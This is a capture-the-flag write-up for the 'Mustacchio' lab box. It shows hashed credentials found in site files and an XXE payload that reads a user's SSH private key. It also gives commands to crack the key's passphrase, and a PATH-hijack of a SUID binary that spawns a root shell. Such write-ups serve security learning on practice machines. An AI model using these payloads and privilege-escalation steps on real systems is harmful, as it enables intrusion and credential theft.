# Mustacchio
## Tasks
### user.txt
### root.txt
## Vulnerabilities
### Hash credentials in source code.
### Weak password
### XXE injection
### Not calling binary from $PATH



# NMAP

Port 80 and 22 is open
Doing a full port scan reveals port 8765 is open 

# Foothold
Found interesting stuff in custom/js directory.
```txt
mobile.js
users.bak
```
Using crackstation, the hash in mobile.js seems to be a MD5.
```text
bcf063452ff1193524e499349d0ac459 
```
Checking out the users.bak file, there is also credentials there.
```txt
admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
```
After that I went to check out port 8765, which seems to be a admin page. We can login using the credentials we found earlier.

Opening up the page, it asks us to give a comment. Typing nothing into it alerts us
```txt
Insert XML Code!
```
Perhaps this is hinting us towards XXE injection.
Let's look at the source code.
```html
 <!-- Barry, you can now SSH in using your key!-->
//document.cookie = "Example=/auth/dontforget.bak"
```
Looks like there is a id_rsa file somewhere.
Downloading this file and opening it up reveals.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
``` 
And yes it is a XML format, it is hinting us how to write our payload. Let's look at Payloadallthings to find a payload to spew out the id_rsa file.
Here's my payload
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY lmao SYSTEM  "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&lmao;</com>
</comment>
```
It will print out the private key, let's try to ssh in with the name barry.
Looks like there is a password for this.

Do not worry, we have ssh2john for this.
```bash
ssh2john.py id_rsa > rsa.john
```
```bash
john  rsa.john --wordlist=rockyou.txt
```
You will then recieve the cracked password! Let's ssh into it.
# Privesc
user.txt can be found instantly on barry's home directory.

Let's find a SUID to elevate privileges.
```bash
-rwsr-xr-x 1 root   root        17K Apr 29 20:32 /home/joe/live_log (Unknown SUID binary)
```
This caught my eye during the linpeas enumeration. It's self-made binary. Let's check it out. This binary basically is the live log of the server.
Checking out the binary, it seems like we can't edit it. Let's look at it with strings.
Let's look how its fetching these logs.
```bash
tail -f /var/log/access.log
```
Looks like it's using the tail binary. But the catch here is that, it doesn't call it from it's full path such as /usr/bin. Let's create add a malicious path and make our own tail so it executes our's tail.
```bash
export PATH=/tmp:$PATH
cd /tmp
vim tail
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
So now whenever we run the tail binary, it should use our tail binary first since it's first in our $PATH.
And just like that, we managed to root the box! Head over to /root and grab that root.flag!
